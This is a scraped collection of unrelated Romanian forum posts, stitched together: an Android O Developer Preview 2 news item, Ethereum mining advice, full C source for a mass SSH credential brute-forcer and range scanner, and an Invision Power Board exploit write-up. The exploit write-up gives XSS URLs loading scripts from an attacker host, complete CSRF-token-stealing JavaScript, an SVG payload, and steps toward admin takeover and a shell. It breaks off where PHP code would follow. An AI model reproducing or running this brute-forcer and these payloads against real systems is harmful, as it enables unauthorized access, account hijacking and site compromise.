Leaderboard

Ce telefoane mobile pot rula Android O în versiunea DP2 Autor: Emil Dragotă, Data: 21.05.2017, 21:52 Software Android O în versiunea Developer Preview 2 a fost lansat de către Google. Poate fi instalat pe Nexus 5x, Nexus 6P, Pixel, Pixel XL, Pixel C și Nexus Player. Cum poți instala Android O DP2 pe dispozitivele menționate? Sunt mai multe alternative: Android O Beta Program; Factory image pentru fiecare dispozitiv în parte. Care sunt noutățile aduse de către Android O DP2? setările rapide cu design actualizat; posibilitatea de a schimba designul icoanelor pentru aplicații ( normal, rotund, pătrat etc); ai acces la widgeturile unei aplicații prin apăsarea prelungită ( disponibil doar în launcher-ul preinstalat – Pixel Launcher); modul de lumină pentru noapte cu posibilitatea de reglare a intensității pe partea de luminozitate; suport nativ pentru managementul parolelor ( secțiunea Setări / Sistem / Limbaj și Metode de introducere / Avansat și acolo apare opțiunea de auto-completare; opțiuni noi de management pentru consumul de energie electrică stocată în acumulator. Google limitează aplicațiile ce necesită refresh constant pe partea de poziționare, sunt mai multe optimizări făcute ca utilizatorul să aibă date concrete legate de consumul generat de fiecare aplicație în parte, informații pe partea de încărcare etc; modul Picture-in-Picture adus la un nivel superior, pagină dedicată în setări; Instant Apps – posibilitatea de a testa o aplicație fără a fi nevoie în a o instala pe dispozitiv; opțiuni noi în zona Wi-Fi și rețea; design nou pentru secțiunea Stocarea din setări. Mai multe detalii în linkul de la sursă. Google dezvoltă din mers și preia feedback în mod real, asta și face sistemul de operare să evolueze, să fie mult mai matur din prima zi în care este lansat comercial. Prin vară o să avem Android 8.0 Oreo în ediție finală, dar și primele telefoane mobile cu această distribuție software. Sursa: https://www.gadget.ro/ce-telefoane-mobile-pot-rula-android-o-versiunea-dp2/

Salut, Scanner-ul foloseste libssh2 (libssh2), pscan.c(inclus in codul sursa). Se ruleaza ptr. scan clasa B: ./brute -b 10.10 -t 1800 -user users.lst -pass pass.lst -p 22 -c "uname -a" Ptr. brute lista ip: ./brute -f ip.lst -t 1800 -user users.lst -pass pass.lst -p 22 -c "uname -a" -t = numarul de thread-uri -p = portul -c = "comanda de executat ip.lst = lista ip-uri cate unul per rand user.lst = lista users, cate unu per rand, pass.lst = lista parole, cate una per rand in pass.lst daca puneti $user, atunci parola va fi ca userul, daca puneti $user123, parola va fi, user123, de ex: user: oracle pass: $user123 scannerul va incerca oracle:oracle123 Sper sa va placa. Initial avea si generare de IP-uri random, dar am scos. Reverificati codul sursa daca va apar erori la compilare. #define LIBSSH2_STATIC 1 #include "libssh2_config.h" #include <libssh2.h> #ifdef HAVE_WINSOCK2_H # include <winsock2.h> #endif #ifdef HAVE_SYS_SOCKET_H # include <sys/socket.h> #endif #ifdef HAVE_NETINET_IN_H # include <netinet/in.h> #endif #ifdef HAVE_SYS_SELECT_H # include <sys/select.h> #endif # ifdef HAVE_UNISTD_H #include <unistd.h> #endif #ifdef HAVE_ARPA_INET_H # include <arpa/inet.h> #endif #include <sys/time.h> #include <sys/types.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <errno.h> #include <stdio.h> #include <ctype.h> #include <netdb.h> #include <time.h> #include <sys/wait.h> #include <termios.h> #define ALB "\033[1;37m" #define ALB2 "\033[5;37m" #define NORM "\033[00;00m" #define BOLD "\033[00;01m" #define ROSU "\033[01;31m" #define GALBE "\033[01;33m" #define VERDE "\033[01;32m" #define ALBASTRU "\033[01;34m" #define FAKE "./jahid" #define COMPUTATIONS 3000 #define TOTAL_VAL_COUNT 254 #define MAX_SOCKETS 1000 #define TIMEOUT 3 #define S_NONE 0 #define S_CONNECTING 1 #define TABLELEN 63 #define BUFFFERLEN 128 #define ENCODERLEN 4 #define ENCODEROPLEN 0 #define ENCODERBLOCKLEN 3 #define PADDINGCHAR '=' #define BASE64CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"\ "abcdefghijklmnopqrstuvwxyz"\ "0123456789"\ "+/"; #define _FILE_OFFSET_BITS 64 #define EOL '\n' #define CAR_RETURN '\r' #define SUCCESS 0 #define FAILURE -1 struct conn_t { int s; char status; time_t a; struct sockaddr_in addr; }; struct conn_t connlist[MAX_SOCKETS]; void init_sockets(void); void check_sockets(void); void fatal(char *); FILE *outfd; int tot = 0; int flag,where; int numforks,maxf; unsigned char denominator = TOTAL_VAL_COUNT+1; char *replace_str(char *str, char *orig, char *rep) { static char buffer[4096]; char *p; if(!(p = strstr(str, orig))) return str; strncpy(buffer, str, p-str); buffer[p-str] = '\0'; sprintf(buffer+(p-str), "%s%s", rep, p+strlen(orig)); return buffer; } void init_sockets(void) { int i; for (i = 0; i < MAX_SOCKETS; i++) { connlist[i].status = S_NONE; memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in)); } return; } void check_sockets(void) { int i, ret; for (i = 0; i < MAX_SOCKETS; i++) { if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING)) { close(connlist[i].s); connlist[i].status = S_NONE; } else if (connlist[i].status == S_CONNECTING) { ret = connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr, sizeof(struct sockaddr_in)); if (ret == -1) { if (errno == EISCONN) { tot++; fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } if ((errno != EALREADY) && (errno != EINPROGRESS)) { close(connlist[i].s); connlist[i].status = S_NONE; } } else { tot++; fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } } } } void fatal(char *err) { int i; printf("Error: %s\n", err); for (i = 0; i < MAX_SOCKETS; i++) if (connlist[i].status >= S_CONNECTING) close(connlist[i].s); fclose(outfd); exit(EXIT_FAILURE); } static int waitsocket(int socket_fd, LIBSSH2_SESSION *session) { struct timeval timeout; int rc; fd_set fd; fd_set *writefd = NULL; fd_set *readfd = NULL; int dir; timeout.tv_sec = 2; timeout.tv_usec = 0; FD_ZERO(&fd); FD_SET(socket_fd, &fd); dir = libssh2_session_block_directions(session); if(dir & LIBSSH2_SESSION_BLOCK_INBOUND) readfd = &fd; if(dir & LIBSSH2_SESSION_BLOCK_OUTBOUND) writefd = &fd; rc = select(socket_fd + 1, readfd, writefd, NULL, &timeout); return rc; } int checkauth(char *username,char *password,char *hostname, char *portar, char *command) { const char *commandline = command; FILE *vulnf,*nolog; unsigned long hostaddr; int sock, port; struct sockaddr_in sin; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; int rc; int exitcode; char *exitsignal=(char *)"none"; int bytecount = 0; size_t len; int type, var; struct timeval timeout; timeout.tv_sec = 10; timeout.tv_usec = 0; port=atoi(portar); rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return 1; } hostaddr = inet_addr(hostname); sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr.s_addr = hostaddr; if (setsockopt (sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { return -1; } session = libssh2_session_init(); while ((rc = libssh2_session_handshake(session, sock)) == LIBSSH2_ERROR_EAGAIN); if (rc) { return -1; } while ((rc = libssh2_userauth_password(session, username, password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { goto shutdown; } while( (channel = libssh2_channel_open_session(session)) == NULL && libssh2_session_last_error(session,NULL,NULL,0) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( channel == NULL ) { goto shutdown; } while( (rc = libssh2_channel_exec(channel, commandline)) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( rc != 0 ) { goto shutdown; } for( ;; ) { int rc; do { char buffer[65535]; rc = libssh2_channel_read( channel, buffer, sizeof(buffer) ); if( rc > 0 ) { int i; bytecount += rc; hostname = strtok (hostname, "\n"); fprintf(stderr, "[*] WOW : %s:%s %s port: %s \n", username,password,hostname, portar); fprintf(stderr, "[*] Kernel: %s \n", buffer); vulnf=fopen("sparte.txt","a+"); fprintf(vulnf,"%s:%s %s port: %s --> %s \n",username,password,hostname,portar, buffer); fclose(vulnf); goto shutdown; for( i=0; i < rc; ++i ) var = i; } else { if( rc != LIBSSH2_ERROR_EAGAIN ) goto shutdown; } } while( rc > 0 ); if( rc == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } else break; } exitcode = 127; while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN ) waitsocket(sock, session); if( rc == 0 ) { exitcode = libssh2_channel_get_exit_status( channel ); libssh2_channel_get_exit_signal(channel, &exitsignal, NULL, NULL, NULL, NULL, NULL); } if (exitsignal) var = var; else var = var; libssh2_channel_free(channel); close(sock); channel = NULL; libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); libssh2_exit(); exit(0); shutdown: libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); #ifdef WIN32 closesocket(sock); #else close(sock); #endif var = var; libssh2_exit(); return 0; } int scanbclass(char *bclass, char *port) { int done = 0, i, cip = 1, bb = 0, ret, k, ns, x; time_t scantime; char ip[20], outfile[128], last[256]; int unlink(const char *pathname); errno = 0; if(unlink("scan.log")) { printf("\n unlink() failed - [%s]\n",strerror(errno)); } memset(&outfile, 0, sizeof(outfile)); snprintf(outfile, sizeof(outfile) - 1, "scan.log", bclass, port); if (!(outfd = fopen(outfile, "a"))) { perror(outfile); exit(EXIT_FAILURE); } printf("[-] Searching: ", bclass); fflush(stdout); memset(&last, 0, sizeof(last)); init_sockets(); scantime = time(0); while(!done) { for (i = 0; i < MAX_SOCKETS; i++) { if (cip == 255) { if (bb == 255) { ns = 0; for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE) { ns++; break; } } if (ns == 0) done = 1; break; } else { cip = 0; bb++; for (x = 0; x < strlen(last); x++) putchar('\b'); memset(&last, 0, sizeof(last)); snprintf(last, sizeof(last) - 1, "%s.%d.* on port: %s [Found: %d] [%.1f%% Done]", bclass, bb, port, tot, (bb / 255.0) * 100); printf("%s", last); fflush(stdout); } } if (connlist[i].status == S_NONE) { connlist[i].s = socket(AF_INET, SOCK_STREAM, 0); if (connlist[i].s == -1) printf("Unable to allocate socket.\n"); else { ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK); if (ret == -1) { printf("Unable to set O_NONBLOCK\n"); close(connlist[i].s); } else { memset(&ip, 0, 20); sprintf(ip, "%s.%d.%d", bclass, bb, cip); connlist[i].addr.sin_addr.s_addr = inet_addr(ip); if (connlist[i].addr.sin_addr.s_addr == -1) fatal("Invalid IP."); connlist[i].addr.sin_family = AF_INET; connlist[i].addr.sin_port = htons(atoi(port)); connlist[i].a = time(0); connlist[i].status = S_CONNECTING; cip++; } } } } check_sockets(); } printf("\n[!] Scanning complete In %u Seconds. [We got %d ips]\n", (time(0) - scantime), tot); fclose(outfd); return 1; } int line_count(char* __str_file_name) { FILE* fd; int ch; if ((fd = fopen(__str_file_name, "r")) == NULL) { printf("[Error] : While opening the file\n"); exit(0); } unsigned int line_count = 0; while ( (ch = fgetc(fd)) != EOF) if (ch == EOL || ch == CAR_RETURN) ++line_count; if (fd) { fclose(fd); } return line_count; } int scan(char *app, char *thr, char *ipfile, char *userfile, char *passfile, char *portar, char *commandline) { int numforks, maxf, status; FILE *fp,*passf, *userf; char buff[4096]; char nutt2[4096]; char nutt[4096]; char *pass, *user; malloc(sizeof(nutt)); malloc(sizeof(nutt2)); malloc(sizeof(buff)); pid_t PID; char *ns = NULL; maxf=atoi(thr); if((userf=fopen(userfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", userfile)); while (fgets(nutt2,sizeof(nutt2),userf)){ user = strdup (nutt2); user = strtok (user, "\n"); if((passf=fopen(passfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", passfile)); while (fgets(nutt,sizeof(nutt),passf)) { pass = strdup (nutt); pass = strtok (pass, "\n"); ns = replace_str(pass, "$user", user); printf("[*] Trying: %s:%s on found ips\n",user,ns); if((fp=fopen(ipfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s", ipfile)); while(fgets(buff,sizeof(buff),fp)) { PID = fork(); if (PID < 0) { fprintf(stderr, "[!] Couldn't fork!\n"); exit(1); } if (( PID == 0 )){ checkauth(user,ns,buff, portar, commandline); //printf("[*] Trying: %s:%s %s:%s Protocol:%s\n",user,ns, buff,portar,prot); exit(0); } else { numforks++; if (numforks > maxf) for (numforks; numforks > maxf; numforks--) PID = wait(&status); } } fclose(fp); } fclose(passf); } fclose(userf); exit(0); } int main(int argc, char *argv[]) { int input,i=0; FILE *fp,*passf, *userf, *scanf; char encodedoutput[BUFFFERLEN + 1] = ""; char decodedoutput[BUFFFERLEN + 1] = ""; char *userfile, *passfile, *command, *threads, *scanfile, *bclass, *port, *t2, *prot; if(strcmp(argv[1],"-f")==0) { input = 1; } if(strcmp(argv[1],"-r")==0) { input = 2; } if(strcmp(argv[1],"-R")==0) { input = 3; } if(strcmp(argv[1],"-b")==0) { input = 4; } switch ( input ) { case 1: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } scanfile = argv[2]; if((scanf=fopen(scanfile,"r"))!= NULL){ if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { scan(argv[0],threads,scanfile,userfile,passfile,port,command);} else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; case 2: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { //genrand(argv[0],threads,userfile,passfile,port,command); } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; case 3: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) { //genrandl(threads, port); } else { goto err; } } else { goto err; } break; case 4: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } bclass = argv[2]; if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { scanbclass(bclass, port); scan(argv[0],threads,"scan.log",userfile,passfile,port, command); } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; default: printf( "Bad command, quitting!\n" ); exit (0); break; } getchar(); exit (0); err: exit (-1); } JIHAD!

Daca inchizi pc-ul cand te reconectezi trebuie doar sa downloadezi o parte din blockchain (resincronizare), care depinde de cat de mult timp stai deconectat. Nu trebuie sa iti creezi o alta adresa de fiecare data cand te reconectezi. In plus cand minezi in geth, minezi peste ultimul block din blockchainlul local (deci trebuie sa sincronizezi inainte) si minezi direct in adresa din etherbase. aaa si CITESTE MANUALUL! AI O DOCUMENTATIE FT BUNA PE SITE-UL OFICIAL! (mai da si cu google translate) https://github.com/ethereum/go-ethereum/wiki/Managing-your-accounts https://ethereum.stackexchange.com/questions/392/how-can-i-get-a-geth-node-to-download-the-blockchain-quickly https://github.com/ethereum/go-ethereum/wiki/mining https://github.com/ethereum/go-ethereum/wiki/Command-Line-Options

Cate gpu ai? Nu iti recomand sa minezi singur. Prinzi blocuri destul de rar si trebuie sa minezi mult. (vezi ca network hashrate e destul de mare si e in crestere. cred cs dificultatea/block o sa creasca repede) Eu am minat cu 28Mh/s intr-un pool (miningpoolhub). Avantajul e ca nu trebuie sa descarci blockchainul si plata e PPLNS (google it) adica in portii mici si frecvente. Se merita sa minezi solo daca ai peste 80-100Mh/s. Wallet am de la myetherwallet.com. E destul de sigur si comod de utilizat. (daca prind pe vrunul comentand aiurea ca eth/myetherwallet/miningpool nu e sigur sau are vulnerabilitati va fut) M-am plictisit de copii care comenteaza fara sa inteleaga nici cel mai simplu concept "nu cred ca e sigur" "nu imi inspira incredere"

______ ______ _____ ___ _____ _____ _____ | ___ \ | ___ \ | _ | |_ | | ___| / __ \ |_ _| | |_/ / | |_/ / | | | | | | | |__ | / \/ | | | __/ | / | | | | | | | __| | | | | | | | |\ \ \ \_/ / /\__/ / | |___ | \__/\ | | \_| \_| \_| \___/ \____/ \____/ \____/ \_/ _____ _ _ _____ _____ _____ _ _ ______ _____ _____ __ __ |_ _| | \ | | / ___| | ___| / __ \ | | | | | ___ \ |_ _| |_ _| \ \ / / | | | \| | \ `--. | |__ | / \/ | | | | | |_/ / | | | | \ V / | | | . ` | `--. \ | __| | | | | | | | / | | | | \ / _| |_ | |\ | /\__/ / | |___ | \__/\ | |_| | | |\ \ _| |_ | | | | \___/ \_| \_/ \____/ \____/ \____/ \___/ \_| \_| \___/ \_/ \_/ [+]--------------------------------------------------------------[+] | Vulnerable Software: Invision Power Board | | Tested on: v4.1.4.1 (current build) | | Vendor: http://invisionpower.com/ | | Vulnerability Type: Reflected and Stored XSS | | Cross-Site Request Forgery | | File Upload (svg) | | Information Disclosure | | Shell Access via ACP | | Date Released: 09/05/2017 | | Released by: CDL (@sxcurity) + dkb (svg method) | [+]--------------------------------------------------------------[+] [+] Description: Invision Power Board version 4.1.19.2 (current version as of this release) and below, is vulnerable to pre-auth reflected XSS in the IPS UTF8 Converter v1.1.18 and stored XSS in the Announcements. The vulnerability in the IPS UTF8 Converter can easily be used to make a malicious announcement then affects any user that views the announcement. There are also Stored XSS + Information Disclosure vulnerabilities in the attachments feature found in User CP. This can be triggered by any user and can be used to gain access to mod/admin accounts. ------------------------------------------------------------------------------------------------------------- [+] Summary: The IPS UTF8 Converter does not properly sanitize the `controller` parameter, which is reflected in the response. Therefore, an attacker may craft a payload to close the current expression andinsert malicious javascript and HTML. The stored xss via the announcements requires a moderator or admin account to exploit. If you create a new announcement, you can choose the ""<> Source" option, which does not validate HTML tags or event handlers. This allows anyone with access to a moderator account to attack all users, mods, and admins. [+] In addition to this, it is possible to trigger stored XSS via a file upload bug regarding attachments. This also leads to information disclosure (FPD + the path to the uploaded SVG file, allowing you to bypass the randomly generated filename) This stored XSS can be achieved from any user account. No mod or admin privs required. A regular user can craft a payload to make themselves admin as a result of this vulnerability. There are very specific steps required to reproduce this bug which will be detailed after the first Proof of Concept is displayed ------------------------------------------------------------------------------------------------------------- [+]========= Proof of Concepts =========[+] [+] Video: https://drive.google.com/file/d/0B3vXUYdNMECWMHVMaGVlMjVZMjg/view?usp=sharing [+] Simple alert http://<target>/admin/convertutf8/index.php?controller=%27};alert(document.domain);{%27 [+] Triggering stored XSS in announcements. http://<target>/admin/convertutf8/index.php?controller='};</script><script src=//<attacker>/xss.js></script>;{' If a moderator or admin visits this URL, the script steals the CSRF tokens from the mod/admin, builds the CSRF form with the payload, and creates a malicious announcement with the attackers specified XSS payload. When anyone reads this announcement, the XSS will fire! [+] Abusing this XSS to attack users http://<target>/admin/convertutf8/index.php?controller='};</script><script src=//<attacker>/lol.js></script>;{' When a logged in user visits this page, it will steal the user's CSRF token, enable status updates and then change their "About Me" to "sxcurity is my hero" ;) [+]======= xss.js =======[+] /* http://www.sxcurity.pro/pocs/xss.js _ (_)_ ____ ___ __ | | '_ \ \ /\ / / '_ \ | | |_) \ V V /| | | | |_| .__/ \_/\_/ |_| |_| |_| IPB Exploit by @sxcurity */ // specifies the target, the title of the announcement, and the xss payload! var target = 'http://<target>/index.php?/modcp/announcements/&action=create'; var title = 'URGENT'; // Don't use quotes! It'll break our form down below! var payload = '<script src=//<ATTACKER>/lol.js></script>'; // steals the csrf token ;) var cdl = get(target); document.body.innerHTML = cdl; var form = document.getElementsByTagName('input')[3]; var token = form.value; // DON'T EDIT!! // Gets the current date! Thanks stackoverflow var today = new Date(); var dd = today.getDate(); var mm = today.getMonth()+1; //January is 0! var yyyy = today.getFullYear(); if(dd<10){ dd='0'+dd; } if(mm<10){ mm='0'+mm; } var today = mm+'/'+dd+'/'+yyyy; // build form with valid token and evil credentials document.body.innerHTML += '<form id="sxcurity" action="' + target + '" method="POST">' + '<input type="hidden" name="_submitted" value="1">' + '<input type="hidden" name="csrfKey" value="' + token + '">' + '<input type="hidden" name="MAX_FILE_SIZE" value="2097152">' + '<input type="hidden" name="plupload" value="sxcurity">' + '<input type="hidden" name="announce_title" value="' + title + '">' + '<input type="hidden" name="announce_start" value="' + today +'">' + '<input type="hidden" name="announce_end_unlimited" value="0">' + '<input type="hidden" name="announce_content" value="'+ payload +'">' + '<input type="hidden" name="announce_content_upload" value="sxcurity">' + '<input type="hidden" name="announce_app_unlimited" value="*">' + '<input type="hidden" name="announce_calendars">' + '<input type="hidden" name="announce_calendars-zeroVal" value="on">' + '<input type="hidden" name="announce_download_categories">' + '<input type="hidden" name="announce_download_categories-zeroVal" value="on">' + '<input type="hidden" name="announce_forums">' + '<input type="hidden" name="announce_forums-zeroVal" value="on">' + '</form>'; // submits our csrf form! document.forms["sxcurity"].submit(); function get(url) { var xmlHttp = new XMLHttpRequest(); xmlHttp.open("GET", url, false); xmlHttp.send(null); return xmlHttp.responseText; } [+]======= lol.js =======[+] /* www.sxcurity.pro/pocs/lol.js _ (_)_ ____ ___ __ | | '_ \ \ /\ / / '_ \ | | |_) \ V V /| | | | |_| .__/ \_/\_/ |_| |_| |_| IPB Exploit by @sxcurity index.php?/profile/<user>/&tab=field_core_pfield_1 This will add "sxcurity is my hero" to the user's about me. */ var target = 'http://localhost/ips_4141/index.php'; var payload = 'sxcurity is my hero'; // Gets the Profile URL of the victim. var cdl = get(target); document.body.innerHTML = cdl; var user_url = document.getElementsByTagName('a')[13]; var user_url1 = document.getElementsByTagName('a')[14]; var user_url2 = document.getElementsByTagName('a')[15]; var user_url3 = document.getElementsByTagName('a')[16]; var user_url4 = document.getElementsByTagName('a')[17]; var user_url5 = document.getElementsByTagName('a')[18]; var user_url6 = document.getElementsByTagName('a')[19]; var user_url7 = document.getElementsByTagName('a')[20]; var yay = user_url.href; var yay1 = user_url1.href; var yay2 = user_url2.href; var yay3 = user_url3.href; var yay4 = user_url4.href; var yay5 = user_url5.href; var yay6 = user_url6.href; var yay7 = user_url7.href; var mod_check0 = document.getElementsByTagName('a')[22]; var mod_check1 = document.getElementsByTagName('a')[22]; var mod_check2 = document.getElementsByTagName('a')[23]; var mod_check3 = document.getElementsByTagName('a')[24]; var mod_check4 = document.getElementsByTagName('a')[25]; var mod_check5 = document.getElementsByTagName('a')[26]; var mod_check6 = document.getElementsByTagName('a')[27]; var check0 = mod_check1.href; var check1 = mod_check1.href; var check2 = mod_check2.href; var check3 = mod_check3.href; var check4 = mod_check4.href; var check5 = mod_check5.href; var check6 = mod_check5.href; /* Mods / admins have a different amount of links before their profile URL, so this makes sure we grab the right profile URL and not some random one! */ if (yay.includes("profile")){ //user = normal user acc. var profile = yay; } else if (yay1.includes("profile")){ //user = normal user acc. var profile = yay1; } else if (yay2.includes("profile")){ //user = normal user acc. var profile = yay2; } else if (yay3.includes("profile")){ //user = normal user acc. var profile = yay3; } else if (yay4.includes("profile")){ //user = normal user acc. var profile = yay4; } else if (yay5.includes("profile")){ //user = normal user acc. var profile = yay5; } else if (yay6.includes("profile")){ //user = normal user acc. var profile = yay6; } else if (yay7.includes("profile")){ //user = normal user acc. var profile = yay7; } else if (check0.includes("profile")){ //user = mod or admin var profile = check0; } else if (check2.includes("profile")){ //user = mod or admin var profile = check2; } else if (check3.includes("profile")){ //user = mod or admin var profile = check3; } else if (check4.includes("profile")){ //user = mod or admin var profile = check4; } else if (check5.includes("profile")){ //user = mod or admin var profile = check5; } else if (check6.includes("profile")){ //user = mod or admin var profile = check6; } var final = profile + 'edit/'; // steals the csrf token var csrf = get(final); document.body.innerHTML = csrf; var inp = document.getElementsByTagName('input')[3]; var token = inp.value; // build form with valid token and evil credentials document.body.innerHTML += '<form id="woot" action=' + final + ' method="POST">' + '<input type="hidden" name="form_submitted" value="1">' + '<input type="hidden" name="csrfKey" value="' + token + '">' + '<input type="hidden" name="MAX_FILE_SIZE" value="2097152">' + '<input type="hidden" name="plupload" value="sxcurity">' + '<input type="hidden" name="bday[month]" value="0">' + '<input type="hidden" name="bday[day]" value="0">' + '<input type="hidden" name="bday[year]" value="0">' + '<input type="hidden" name="enable_status_updates" value="0">' + '<input type="hidden" name="enable_status_updates_checkbox" value="1">' + '<input type="hidden" name="core_pfield_1" value="' + payload + '">' + '<input type="hidden" name="core_pfield_1_upload" value="sxcurity">' + '</form>'; // submits our csrf form! document.forms["woot"].submit(); function get(url) { var xmlHttp = new XMLHttpRequest(); xmlHttp.open("GET", url, false); xmlHttp.send(null); return xmlHttp.responseText; } ------------------------------------------------------------------------------------------------------------- [+]========= Method 2 (Stored XSS via SVG upload) =========[+] Although the method above requires mod access, this next method will allow a regular user to obtain mod/admin access with relative ease. It involves uploading an SVG file as an attachment and then taking advantage of some information disclosure to get the path to the uploaded file, here are the steps to reproduce: 1 > Visit your profile and click edit profile 2 > Enable Status Updates 3 > Reload the page & select the status update input 4 > Click "add an attachment" and select your SVG file 5 > Once uploaded, reload the page (BEFORE you submit status update) 6 > Once page is reloaded, select the status page input box again. You will see your attachment already there 7 > Use inspect element or view the page source to find the path to where your attachment has been uploaded 8 > CTRL + F ".svg" and take advantage of the full path disclosure to get the upload location When your SVG file is uploaded, it generates a random hash to add to the URL name (as well as attempting to hide the upload path). In addition to status updates, this can also be achieved in threads (resulting in total chaos for the admin of the vuln site) The fact this can be used in threads makes it wormable. A regular user account can be used to target anyone who views any thread posted by that user (or any thread posted by ANY user if a specific worm-based payload was crafted) Your malicious SVG file would look something like this (of course this is not a weaponized payload): <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie);"/> If you refreshed and did inspect element at the right time, you should see something like this in the source: ------------------------------------------------------------------------------------------------------------- data-ipsuploader-existingfiles="{&quot;102&quot;:{&quot;configuration&quot;:{&quot;dir&quot;:&quot;\/home\/services\/Services\/ipbcommunity\/uploads&quot; ,&quot;url&quot;:&quot;uploads&quot;} ,&quot;configurationId&quot;:1,&quot;storageExtension&quot;:&quot;core_Attachment&quot; ,&quot;originalFilename&quot;:&quot;xss.svg&quot;,&quot;filename&quot; :&quot;xss.svg.d9b51a7a276cfbc0625876e30bce299a.svg&quot; ,&quot;container&quot;:&quot;monthly_2017_05&quot;,&quot;url&quot; :{&quot;data&quot;:{&quot;scheme&quot;:&quot;https&quot;,&quot;host&quot; :&quot;vuln.site.com&quot;,&quot;path&quot;:&quot;\/uploads\/monthly_2017_05\/xss.svg.d9b51a7a276cfbc0625876e30bce299a.svg&quot; },&quot;queryString&quot;:[],&quot;isInternal&quot;:true,&quot;isFriendly&quot;:true},&quot;tempId&quot;:null,&quot;attachmentThumbnailUrl&quot; :{&quot;data&quot;:{&quot;scheme&quot;:&quot;https&quot;,&quot;host&quot;:&quot;vuln.site.com&quot;,&quot;path&quot;:&quot;\/uploads\/monthly_2017_05\/xss.svg.d9b51a7a276cfbc0625876e30bce299a.svg&quot;} ,&quot;queryString&quot;:[],&quot;isInternal&quot;:true,&quot;isFriendly&quot;:true},&quot;thumbnailName&quot;:null,&quot;thumbnailContainer&quot;:null}}" ------------------------------------------------------------------------------------------------------------- From there, you can see the full path: In addition to this, we can also look at the URL in the source here to get the correct URL for where the XSS has been uploaded (there is a mechanism in place to attempt to prevent this from being possible by generating a unique string and adding it to the filename for the uploaded file, but by refreshing the page at the right time and viewing source we can see the full path for the upload including the unique string) here is an example: ;:{&quot;scheme&quot;:&quot;https&quot;,&quot;host&quot;:&quot;community.vuln.com&quot;,&quot;path&quot;:&quot;\/uploads\/monthly_2017_05\/xss.svg.d9b51a7a276cfbc0625876e30bce299a.svg&quot;} this can be seen in the source, which when decoded would translate to: https://community.vuln.com/uploads/monthly_2017_05/xss.svg.d9b51a7a276cfbc0625876e30bce299a.svg This can then either be used in a similar fashion to reflective XSS and linked to the victims, or it can be used within threads (via attachments) using the same method, which can allow someone from a regular user account to target the sites entire userbase (allowing for many possibilities, such as creating a worm, getting admin credentials, etc) ------------------------------------------------------------------------------------------------------------- This method is semi-public but it's definitely worth including to show what XSSing an IPB admin could lead to. Once access to the admin panel has been gained, the following method can be used to obtain a shell: - Navigate to admin panel -> Go to "Look and Feel" -> Manage languages -> Choose langauge -> Choose Section -> look for 'public_help' -> edit 'help.txt' -> Choose topic from list After this, a box should pop up where you can make edits to help.txt, the following PHP code can then be added: 